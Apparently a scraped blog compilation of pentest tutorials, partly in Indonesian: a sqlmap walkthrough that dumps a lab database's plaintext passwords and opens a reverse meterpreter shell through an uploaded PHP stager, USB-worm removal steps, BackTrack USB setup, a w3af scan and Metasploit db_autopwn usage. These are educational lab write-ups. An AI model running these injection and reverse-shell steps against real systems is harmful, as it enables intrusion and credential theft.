I will separate this in 3 section, as a fingerprinter (we already knew this), as an enumerator (of course), and as a destroyer (hmm..?!). Check it out.

Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py –url “http://192.168.1.102/vid.php?id=818″

sqlmap/0.9-dev – automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 22:26:52

[22:26:52] [INFO] using ‘/pentest/database/sqlmap/output/192.168.1.102/session’ as session file
[22:26:52] [INFO] resuming match ratio ’0.972′ from session file
[22:26:52] [INFO] resuming injection point ‘GET’ from session file
[22:26:52] [INFO] resuming injection parameter ‘id’ from session file
[22:26:52] [INFO] resuming injection type ‘numeric’ from session file
[22:26:52] [INFO] resuming 0 number of parenthesis from session file
[22:26:52] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[22:26:52] [INFO] resuming remote absolute path of temporary files directory ‘C:/WINDOWS/Temp’ from session file
[22:26:52] [INFO] testing connection to the target url
[22:26:52] [INFO] testing for parenthesis on injectable parameter
[22:26:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5

[*] shutting down at: 22:26:52

Yes, we knew this at all. Dump the database engine, the version, and the operating system information.

Enumerate Database

root@bt:/pentest/database/sqlmap# ./sqlmap.py –url “http://192.168.1.102/vid.php?id=818″ –dbs

———————————————————————

[22:28:41] [INFO] fetching database names
[22:28:41] [INFO] fetching number of databases
[22:28:41] [INFO] retrieved: 6
[22:28:41] [INFO] retrieved: information_schema
[22:28:44] [INFO] retrieved: cdcol
[22:28:45] [INFO] retrieved: mysql
[22:28:46] [INFO] retrieved: phpmyadmin
[22:28:47] [INFO] retrieved: test
[22:28:48] [INFO] retrieved: webappdb
available databases [6]:
[*] cdcol
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] webappdb

Dump the database, yes..SQLMap always do the great stuff!

Enumerate tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py –url “http://192.168.1.102/vid.php?id=818″ -D webappdb –tables

[22:32:32] [INFO] fetching tables for database ‘webappdb’
[22:32:32] [INFO] fetching number of tables for database ‘webappdb’
[22:32:32] [INFO] retrieved: 2
[22:32:33] [INFO] retrieved: guestbook
[22:32:34] [INFO] retrieved: users
Database: webappdb
[2 tables]
+———–+
| guestbook |
| users     |
+———–+

Dump the tables

[22:36:54] [INFO] fetching columns for table ‘users’ on database ‘webappdb’
[22:36:54] [INFO] fetching number of columns for table ‘users’ on database ‘webappdb’
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: 4
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: id
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: name
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: password
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: country
[22:36:54] [INFO] fetching entries for table ‘users’ on database ‘webappdb’
[22:36:54] [INFO] fetching number of entries for table ‘users’ on database ‘webappdb’
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: 3
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: ID
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: 1
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: admin
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: 123456
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: ID
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: 2
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: secret
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: password
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: SG
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: 3
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: backup
[22:36:54] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.1.102/session’: backup12
Database: webappdb
Table: users
[3 entries]
+———+—-+——–+———-+
| country | id | name   | password |
+———+—-+——–+———-+
| ID      | 1  | admin  | 123456   |
| ID      | 2  | secret | password |
| SG      | 3  | backup | backup12 |
+———+—-+——–+———-+

[22:36:54] [INFO] Table ‘webappdb.users’ dumped to CSV file ‘/pentest/database/sqlmap/output/192.168.1.102/dump/webappdb/users.csv’
[22:36:54] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/192.168.1.102′

[*] shutting down at: 22:36:54

SQLMap do a great job so far  Next, take over the system!!

Remote Command Execution

root@bt:/pentest/database/sqlmap# ./sqlmap.py –url “http://192.168.1.102/vid.php?id=818″ –os-shell

[22:51:25] [INFO] trying to upload the uploader agent

which web application language does the web server support?

root@bt:/pentest/database/sqlmap# ./sqlmap.py –url “http://192.168.1.102/vid.php?id=818″ –msf-path=/opt/metasploit3/msf3 –os-pwn

This time, SQLMap will upload an php file contain shell_exec in order to execute arbitrary command to the remote system via php. After uploaded, SQLMap will trigger the msfpayload (Metasploit Payload) to build “portable executable” meterpreter backdoor. It will be encoded and uploaded via php shell.

When uploaded, SQLMap will trigger “Metasploit listener” called Multi/handler and waiting for the “portable exe backdoor” to be executed. After it executed, the meterpreter shell will come up

I will skip some information here, because it is too long to be dropped here.

—-the process before this line was creating the php shell and upload to document root—–

[22:57:05] [INFO] creating Metasploit Framework 3 payload stager

which connection type do you want to use?

[1] Reverse TCP: Connect back from the database host to this machine (default)

[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535

[3] Bind TCP: Listen on the database host for a connection

> 1

which is the local address? [192.168.1.100]

which local port number do you want to use? [31503]

which payload do you want to use?

[1] Meterpreter (default)

[2] Shell

[3] VNC

> 1

which payload encoding do you want to use?

[1] No Encoder

[2] Alpha2 Alphanumeric Mixedcase Encoder

[3] Alpha2 Alphanumeric Uppercase Encoder

[4] Avoid UTF8/tolower

[5] Call+4 Dword XOR Encoder

[6] Single-byte XOR Countdown Encoder

[7] Variable-length Fnstenv/mov Dword XOR Encoder

[8] Polymorphic Jump/Call XOR Additive Feedback Encoder

[9] Non-Alpha Encoder

[10] Non-Upper Encoder

[11] Polymorphic XOR Additive Feedback Encoder (default)

[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder

[13] Alpha2 Alphanumeric Unicode Uppercase Encoder

> 11

[22:57:46] [INFO] creation in progress ……………. done

[22:58:03] [INFO] compression in progress . done

[22:58:04] [INFO] uploading payload stager to ‘C:/xampp/htdocs/tmpmtonj.exe’

[22:58:04] [INFO] running Metasploit Framework 3 command line interface locally, wait..

[*] Please wait while we load the module tree…

[*] Started reverse handler on 192.168.1.100:31503

[*] Starting the payload handler…

[22:58:27] [INFO] running Metasploit Framework 3 payload stager remotely, wait..

[*] Sending stage (748544 bytes) to 192.168.1.102

[*] Meterpreter session 1 opened (192.168.1.100:31503 -> 192.168.1.102:2561)

meterpreter > Loading extension espia…success.

meterpreter > Loading extension incognito…success.

meterpreter > Loading extension priv…success.

meterpreter > Loading extension sniffer…success.

meterpreter > Computer: XP_FDCC

OS      : Windows XP (Build 2600, Service Pack 3).

Arch    : x86

Language: en_US

meterpreter > Server username: NT AUTHORITY\SYSTEM

meterpreter >

meterpreter > shell

Process 3128 created.

Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\xampp\htdocs>

OS Pwned!

Scan Flashdisk

Seperti yang pernah saya utarakan, bahwa hanya 2 buah antivirus terkenal (kebetulan memang hanya ada 2 komputer yang terinstall 2 buah antivirus tersebut) yaitu Avast Antivirus dan Avira Antivir yang mendeteksi keberadaan virus ini pada sebuah flashdisk milik teman. Terdeteksi oleh Avast sebagai Win32:Trojan-gen {Other} dan oleh Antivir sebagai R/Crypt.PEPM.Gen, sedangkan oleh Ansav dikenal dengan nama W32/Sensus. Saya tidak langsung menghapus semua file virus dengan antivirus, namun saya menghapusnya secara manual. Berikut langkah-langkahnya:

1. Buka command prompt
2. Pindah ke drive letter milik flashdisk (misal F:), ketikkan F:
3. Reset semua attribute file dan folder pada flashdisk, lakukan pada command prompt seperti berikut: F:>attrib -s -r -h /s /d
4. Buka My Computer –> Search, tentukan tempat pencarian hanya pada flashdisk (drive F: saja), lalu masukkan query *.exe pada kolom pencarian. Hal ini untuk mencari file dengan ekstensi .exe. Pastikan File yang dihapus hanyalah file dengan icon Word Document.
5. Yang saya lakukan berikutnya adalah mengambil satu contoh file virus dan mengurungnya dengan kompresi file (saya menggunakan 7zip) dan dipassword.
6. Cek file autorun.inf, perhatikan path tempat virus bersemayam.
7. Cek direktori RECYCLER\[subfolder] apakah ada file berekstensi .exe, kalau ada langsung hapus.
8. Safe and Remove Hardware –> Cabut flashdisk.

Percobaan Install Virus

Virus yang barusan saya karantina akan dianalisa kerjanya, maka saya sengaja menjalankan virus tersebut pada sistem  Windows XP di VMware. Setelah diinstall, saya menjalankan Process Explorer dari SysInternals dan hasilnya menunjukkan bahwa virus menjalankan file-file berikut:

• services.exe
• WINWORD.exe

Semua proses ini akan menjadi janggal ketika saya tidak menginstall apa-apa pada sistem operasi Windows XP tersebut, karena memang masih fresh install. Yang mengejutkan, services.exe membawahi program ping.exe untuk melakukan ping ke www.putera.com sebanyak 30000 kali, hmm..DoS?

Dari ketiga proses tersebut, analisa dilanjutkan untuk mencari keberadaan ketiga file tersebut.

• File services.exe terdapat pada direktori C:\>Program Files\mIRC\IRC Bot\
• File WINWORD.EXE terdapat pada direktori C:\>Program Files\Microsoft Office\

Khusus file services.exe, direktori C:\>Program Files\mIRC\IRC Bot\ akan tidak terlihat, saya menggunakan metode attrib seperti sebelumnya untuk mengeluarkan direktori IRC Bot. Setelah mengetahui cara kerja virus, saya melakukan pemberangusan proses yang berjalan di belakang layar tersebut menggunakan Process Explorer. Dengan memilih Kill Process Tree pada ketiga proses, maka proses yang “nebeng” ketiga program tersebut ikut diberangus. Untuk sementara virus tidak berjalan, namun “sisa-sisa kotoran” virus ini masih ada di komputer kita.

Pembersihan

Sebelum dilakukan pembersihan, yang paling penting adalah mematikan System Restore. Pembersihan kali ini menggunakan program Autoruns keluaran SysInternals. Saya menjalankan program Autoruns dan mencari file-file yang dimaksud satu persatu pada tab-tab menu program Autoruns. Berikut adalah file-file yang harus dibuang dari list.

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Acha.exe
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AmyMastura.exe
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrsz.exe
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\registry.exe
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe
• Adobe Gamma Loader.com (pada menu Startup)

Sedangkan direktori tempat bersemayam virus-virus ini pun harus segera diberangus.

• C:\>Program Files\mIRC\IRC Bot\*.*
• C:\>Program Files\Microsoft Office\WINWORD.EXE
• C:\>Documents and Settings\[user]\Start Menu\Programs\Startup\Adobe Gamma Loader.com

Untuk PC yang terinstall Microsoft Office, silakan copy file WINWORD.EXE dan CTFMON.EXE dari PC yang lain karena file sudah terinfeksi oleh virus tersebut.

Selanjutnya adalah pembersihan di Registry. Untuk mempermudah kerja kita, saya sarankan menggunakan plugin RegistryFX dari Ansav Antivirus, sangat powerful. Silakan download Ansav Antivirus. Setelah itu jalankan Ansav dan pilih Plugins –> RegistryFX, saya menjalankan sesuai pilihan yang sudah ada. Lalu pada Registry:

• [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
  • Shell = “Explorer.exe, %ProgramFiles%\Microsoft Office\WINWORD.EXE”

Hapus value %ProgramFiles%\Microsoft Office\WINWORD.EXE, karena value ini yang selalu menjalankan WINWORD.EXE setelah sistem start. Lalu jalankan lagi fungsi Windows Defender, Automatic Updates, Windows Firewall, dan lainnya.

Demikian penjelasan detil teknis terhadap virus yang meresahkan kampus belakangan ini. Semoga bermanfaat.

Powered by ScribeFire.

• Menyamarkan file Executeable virus menjadi Word Document.
• Melakukan perubahan attribute file menjadi RHS (Read-only, Hidden, System) sehingga tidak terlihat.
• Mematikan Folder Options
• Mematikan Task Manager
• Mematikan Regedit

Maka, ketika ada virus yang masuk ke USB beberapa teman-teman, saya mencoba untuk menganalisa cara kerja virus tersebut dan menemukan sesuatu yang lebih unik dibandingkan virus-virus yang lain. Apa yang unik itu? Ternyata pembuat virus kali ini menggabungkan sebuah bot agent pada virus yang dia buat. Lalu ditambah dengan metode untuk menyembunyikan bot agent ini.

Dilihat dari reaksi antivirus, hanya beberapa antivirus yang merespon keberadaan virus ini (dengan tidak bermaksud membanding-bandingkan kehebatan antivirus) salah duanya yaitu Avast Antivirus dan Avira Antivir. Technical detail untuk membersihkan virus ini akan saya lanjutkan pada versi ke-2.

Powered by ScribeFire.

virus, usb worm

This version gives us some options in boot screen, whether we want to boot into a standard Backtrack or a Compiz version of Backtrack (*shocked*) with your own risk. I prefer choose the default and standard Backtrack configuration than Compiz, because it’s still experimental.

Now, when we started to pentest something and later we want to use the data that has been collected within the pentest, you should choose BT3 Graphics mode with Persistent Changes to save all of your changed configurations.

Since i often use this option, and it’s very annoying, i prefer make some changes to the boot screen configurations. I edited the syslinux.cfg, and copy the BT save changes option to my own boot option. Of course, i commented the experimental boot until it stable on next release

This what i’ve done (assume /dev/sdb as my pendrive)

1. Make sure you have a large disk space on your pendrive.
2. Split your pendrive into 2 partitions, the 1st is for your BT3 files, and the 2nd is for your changes. I have 4 GB pendrive, so i made 2 partitions with 1500MB for BT3 files (with FAT32 FS) and the rest of disk space went to another partition with Ext2 FS.
3. Format it using mkfs (e.g. mkfs.vfat /dev/sdb1; mkfs.ext2 /dev/sdb2)
4. Mount it (e.g. mount /dev/sdb1 /mnt/sdb1;mount /dev/sdb2 /mnt/sdb2)
5. Copy all BT3 files to our new FAT32 partition (e.g. cp -r /path/to/your/extracted/bt3-usb/ /mnt/sdb1). You should now have two directory called BT3 and boot in /mnt/sdb1.
6. Go to your new mounted BT3 directory (/mnt/sdb1), and edit syslinux.cfg on /boot/syslinux/
7. Find this line: APPEND vga=0×317 initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw changes=/changes/slaxsave.dat autoexec=xconf;kdm (in MENU LABEL BT3 Graphics mode with Persistent Changes). Take a look at changes=/changes/slaxsave.dat, this is an option to save all your changes to a file called slaxsave.dat. Now we’re going to make some changes in this boot screen.
8. Remember when i said that i prefer to use the default Xwindow configuration than Compiz experimental configuration? Now we will edit the default configuration of Backtrack 3 boot in syslinux.cfg. Find this line: APPEND vga=0×317 initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw autoexec=xconf;kdm (in MENU LABEL BT3 Graphics mode (KDE)), now insert changes=/dev/sdb2. Our new lines should be APPEND vga=0×317 initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw changes=/dev/sdb2 autoexec=xconf;kdm. Don’t forget to commented the experimental boot option because we’re not gonna use it. After that, save the configuration.
9. Next we will make a directory called changes on /mnt/sdb2 (e.g. mkdir changes /mnt/sdb2). Because all changes will be saved there.
10. Reboot..
11. Boot normally via USB Drive and wait for Backtrack 3 boot prompted.
12. Press TAB to make sure our configuration loaded. You should see our edited lines there, next..boot into our new BT3 Graphics mode (KDE).
13. Let it boot the kernel, extract some lzm, and finally load the desktop (May the sauce be with you )
14. Go setup Nessus to make some changes on this Backtrack, and reboot. Please check whether your configurations is saved or not. If saved, you should see a mirror of BT3 root partition on /mnt/sdb2/changes/
15. Good luck and happy mobile pentesting ^^

UPDATED:

2008-10-10

Here is my syslinux.cfg, this should be in /mnt/sdb1/boot/syslinux/. You may compare from the default.

Thx to Paul Dixon for pastebin.com

w3af (Web Application Attack and Audit Framework) hampir mirip dengan metasploit, bedanya hanya pada objek yang dikerjakan. w3af fokus pada bagian aplikasi web, sedangkan metasploit lebih ke sistem operasi secara keseluruhan. w3af gratis dan opensource, terdiri dari beberapa bagian plugin untuk serangan yaitu mangle, grep,  discovery, audit, evasion, dan bruteforce.

Persiapan

Untuk persiapan menggunakan w3af, banyak program berbasis python yang harus diinstal seperti python-soappy, python-pyopenssl, dll. Saya sendiri menginstallnya di Linux Mint 5.0 yang berbasis Ubuntu, sehingga sedikit tidak merepotkan (karena keluarga Debian yang memudahkan semua perkara instalasi dan dependensi paket). Panduan instalasi terdapat pada situs w3af yang berbasis sourceforge.

Ketika semuanya sudah terinstall, bisa segera dimulai:

$ ./w3af
w3af>>>

Gunakan perintah ‘help’ untuk melihat bantuan (wajib):

w3af>>> help
The following commands are available:
help                You are here. help [command] prints more specific help.
http-settings       Configure the URL opener.
misc-settings       Configure w3af misc settings.
plugins             Enable, disable and configure plugins.
profiles            List and start scan profiles.
start               Start site analysis.
exploit             Exploit a vulnerability.
tools               Enter the tools section.
target              Set the target URL.
version             Show the w3af version.
exit                Exit w3af.
w3af>>>

w3af berbeda dengan console pada metasploit, saya sendiri pada awalnya bingung namun dengan sedikit pemahaman, akhirnya dapat dimengerti bahwa penggunaan console pada w3af adalah dengan mengetikan setiap list yang muncul pada menu help, untuk kembali ke menu awal tinggal mengetikkan ‘back’. Kita akan mencobanya langsung pada salah satu target.

Konfigurasi:

w3af>>> target
w3af/target>>> help
The following commands are available:
help                You are here. help [command|parameter] prints more specific help.
set                 Set a parameter value.
view                List all configuration parameters and current values.
back                Return to previous menu.
w3af/target>>> set target http://demo.testfire.net
w3af/target>>> view

Target sudah kita set, sekarang plugin untuk auditingnya:

w3af/target>>> back
w3af>>> plugins
w3af/plugins>>> help
The following commands are available:
help                You are here. help [command] prints more specific help.
list                List all available plugins.
bruteforce          Enable and configure bruteforce plugins.
discovery           Enable and configure discovery plugins.
output              Enable and configure output plugins.
mangle              Enable and configure mangle plugins.
audit               Enable and configure audit plugins.
evasion             Enable and configure evasion plugins.
grep                Enable and configure grep plugins.
back                Return to previous menu.
w3af/plugins>>>

w3af membutuhkan sedikitnya tiga buah plugin untuk di load, yaitu discovery, audit, dan output. Untuk melihat isi dari masing-masing plugin , jalankan ‘list’ diikuti pluginnya, misal ‘list audit’ maka akan menghasilkan semua isi dari plugin audit seperti xss, xsrf, sql injection, ldap injection, dll. Mengetikan nama plugin (misalkan audit) akan menghasilkan opsi mana yang telah kita set. Contohnya:

w3af/plugins>>> audit xss,sqli,xpath,remoteFileInclude,blindSqli
w3af/plugins>>>

atau bisa juga dengan..

w3af/plugins>>> audit all

Saya akan melakukan test SQL Injection pada sebuah webserver, website linkage dan crawling, memberi laporan secara realtime serta dalam laporan berbentuk html. Berikut langkah-langkahnya.

w3af/plugins>>> audit sqli
w3af/plugins>>> audit
Enabled audit plugins:
sqli
w3af/plugins>>> discovery webSpider,pykto,hmap
w3af/plugins>>> discovery
Enabled discovery plugins:
webSpider
hmap
pykto
w3af/plugins>>> output console,htmlFile
w3af/plugins>>> output
Enabled output plugins:
htmlFile
console
w3af/plugins>>> output config htmlFile
w3af/plugin/htmlFile>>> view
Parameter           Value               Description
=========           =====               ===========
httpFileName        output-http.txt     File name where this plugin will write HTTP requests and responses
reportDebug         False               True if debug information will be appended to the report.
fileName            report.html         File name where this plugin will write to
w3af/plugin/htmlFile>>>

Saya telah melakukan konfigurasi yang sederhana untuk testing ke webserver menggunakan webSpider untuk crawling direktori dan link, lalu pykto untuk audit web (pykto adalah versi python dari nikto), dan hmap untuk host fingerprinting. Hasilnya ditulis pada file output-http.txt dan report.html.

w3af/plugin/htmlFile>>> back
w3af/plugins>>> back
w3af>>>start

silakan menunggu sampai proses auditing selesai.

w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
Auto-enabling plugin: discovery.serverHeader
The Server header for this HTTP server is: squid/2.6.STABLE5
Server uses 503 instead of HTTP 404 error code.
pykto plugin is using “squid/2.6.STABLE5″ as the remote server type. This information was obtained by serverHeader plugin.
Error when requesting: http://demo.testfire.net/
Error: Too many retries when trying to get: http://demo.testfire.net/

http://demo.testfire.net/

pykto plugin found a vulnerability at URL: http://demo.testfire.net/modules.php . Vulnerability description: PHP Nuke module allows user names and passwords to be viewed. See http://www.frog-man.org/tutos/PHP-Nuke6.0-Members_List-Your_Account.txt for other SQL exploits in this module. The vulnerability was found in the request with id 2330.
pykto plugin found a vulnerability at URL: http://demo.testfire.net/bank/ . Vulnerability description: This might be interesting… The vulnerability was found in the request with id 3315.
Hmap web server fingerprint is starting, this may take a while.
hmap: Connection failed to demo.testfire.net:80
New URL found by pykto plugin: http://demo.testfire.net/modules.php
New URL found by pykto plugin: http://demo.testfire.net/bank/

selamat mencoba ^^

Modul db_autopwn diperkenalkan pertama kali pada sistem operasi Linux Backtrack 2, dengan alasan bahwa program tersebut cocoknya berada pada sistem operasi yang berbau auditing/pentest.

Pada kesempatan kali ini, saya ingin menunjukkan cara menjalankan modul db_autopwn pada distro Linux selain Backtrack 2, yaitu Linux Mint 4.0 (Daryna). Yang saya lakukan adalah sebagai berikut:

1.Menyiapkan direktori untuk keperluan download.

tom@m1abrams:~$ sudo mkdir /pentest/
tom@m1abrams:~$ sudo chown tom:admin /pentest/
tom@m1abrams:~$ cd /pentest

2. Install Subversion

tom@m1abrams:/pentest$ sudo apt-get install subversion

3. Install Metasploit dari SVN

tom@m1abrams:/pentest$ svn co http://metasploit.com/svn/framework3/trunk/

4. Install Ruby dan semua paket yang berhubungan.

tom@m1abrams:/pentest$ sudo apt-get install ruby libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems

5.Install Ruby on Rails (jawab ‘Y’ untuk semuanya)

tom@m1abrams:/pentest$ gem install -v=1.2.3 rails

6. Install libgtk2-ruby, libglade2-ruby, sqlite3, dst..

tom@m1abrams:/pentest$ sudo apt-get install libgtk2-ruby libglade2-ruby sqlite3 libsqlite3-ruby1.8 libdbd-sqlite3-ruby1.8

7. Install Nmap

tom@m1abrams:/pentest$ sudo apt-get install nmap

Ok ! Sampai disini, persiapan selesai. Apabila kita melihat isi dari direktori tempat metasploit yang kita download dari SVN, direktorinya bernama trunk, lebih mudah apabila kita menggantinya jadi msf3.

tom@m1abrams:/pentest$ ls
trunk
tom@m1abrams:/pentest$ mv trunk msf3
tom@m1abrams:/pentest$ ls
msf3
tom@m1abrams:/pentest$

8. Silakan masuk ke direktori msf3.

tom@m1abrams:/pentest$ cd msf3
tom@m1abrams:/pentest/msf3$ ls
data lib msfconsole msfgui msfpescan README
documentation modules msfd msfopcode msfweb scripts
external msfcli msfencode msfpayload plugins tools
tom@m1abrams:/pentest/msf3$

9. Jalankan msfconsole..

tom@m1abrams:/pentest/msf3$ ./msfconsole

=[ msf v3.1-dev
+ -- --=[ 259 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 44 aux

msf >

10. Load modul SQLite3 yang telah kita install dan membuat database pentest

msf > load db_sqlite3
msf > db_create pentest

11. Untuk melihat perintah-perintah yang tersedia, ada pada menu help

Database Backend Commands
=========================

Command Description
------- -----------
db_add_host Add one or more hosts to the database
db_add_port Add a port to host
db_autopwn Automatically exploit everything
db_hosts List all hosts in the database
db_import_nessus_nbe Import a Nessus scan result file (NBE)
db_import_nmap_xml Import a Nmap scan results file (-oX)
db_nmap Executes nmap and records the output automatically
db_services List all services in the database
db_vulns List all vulnerabilities in the database

SQLite3 Database Commands
=========================

Command Description
------- -----------
db_connect Connect to an existing database ( /path/to/db )
db_create Create a brand new database ( /path/to/db )
db_destroy Drop an existing database ( /path/to/db )
db_disconnect Disconnect from the current database instance

12. Jalankan db_autopwn untuk melihat menu helpnya.

msf> db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range

13. Testing pada jaringan lokal..

Saya menjalankan perintah db_nmap [network]

msf > db_nmap 192.168.10.*

Starting Nmap 4.20 ( http://insecure.org ) at 2007-12-23 17:57 WIT
Interesting ports on 192.168.10.1:
Not shown: 1693 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Interesting ports on 192.168.10.5:
Not shown: 1696 closed ports
PORT STATE SERVICE
22/tcp open ssh

Interesting ports on 192.168.10.9:
Not shown: 1691 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3389/tcp open ms-term-serv
5000/tcp open UPnP

Nmap finished: 256 IP addresses (3 hosts up) scanned in 3.147 seconds
msf >

Terlihat bahwa pada jaringan lokal tersebut, terdapat 3 host yang ditemukan oleh db_nmap. Hasil scanning tersebut dimasukkan dalam tabel-tabel yang telah dibuat oleh db_sqlite3.

14. Melihat service yang ditemukan oleh db_nmap.

msf > db_services
[*] Service: host=192.168.10.1 port=139 proto=tcp state=up name=netbios-ssn
[*] Service: host=192.168.10.1 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.10.5 port=22 proto=tcp state=up name=ssh
[*] Service: host=192.168.10.9 port=135 proto=tcp state=up name=msrpc
[*] Service: host=192.168.10.9 port=139 proto=tcp state=up name=netbios-ssn
[*] Service: host=192.168.10.9 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.10.9 port=1025 proto=tcp state=up name=NFS-or-IIS
[*] Service: host=192.168.10.9 port=3389 proto=tcp state=up name=ms-term-serv
[*] Service: host=192.168.10.9 port=5000 proto=tcp state=up name=UPnP
msf >

Program db_autopwn dibuat secara mengagumkan dengan memanfaatkan database, sehingga melancarkan serangan otomatis bukanlah mustahil.

Referensi:
Metasploit 3.0 – Automated Exploitation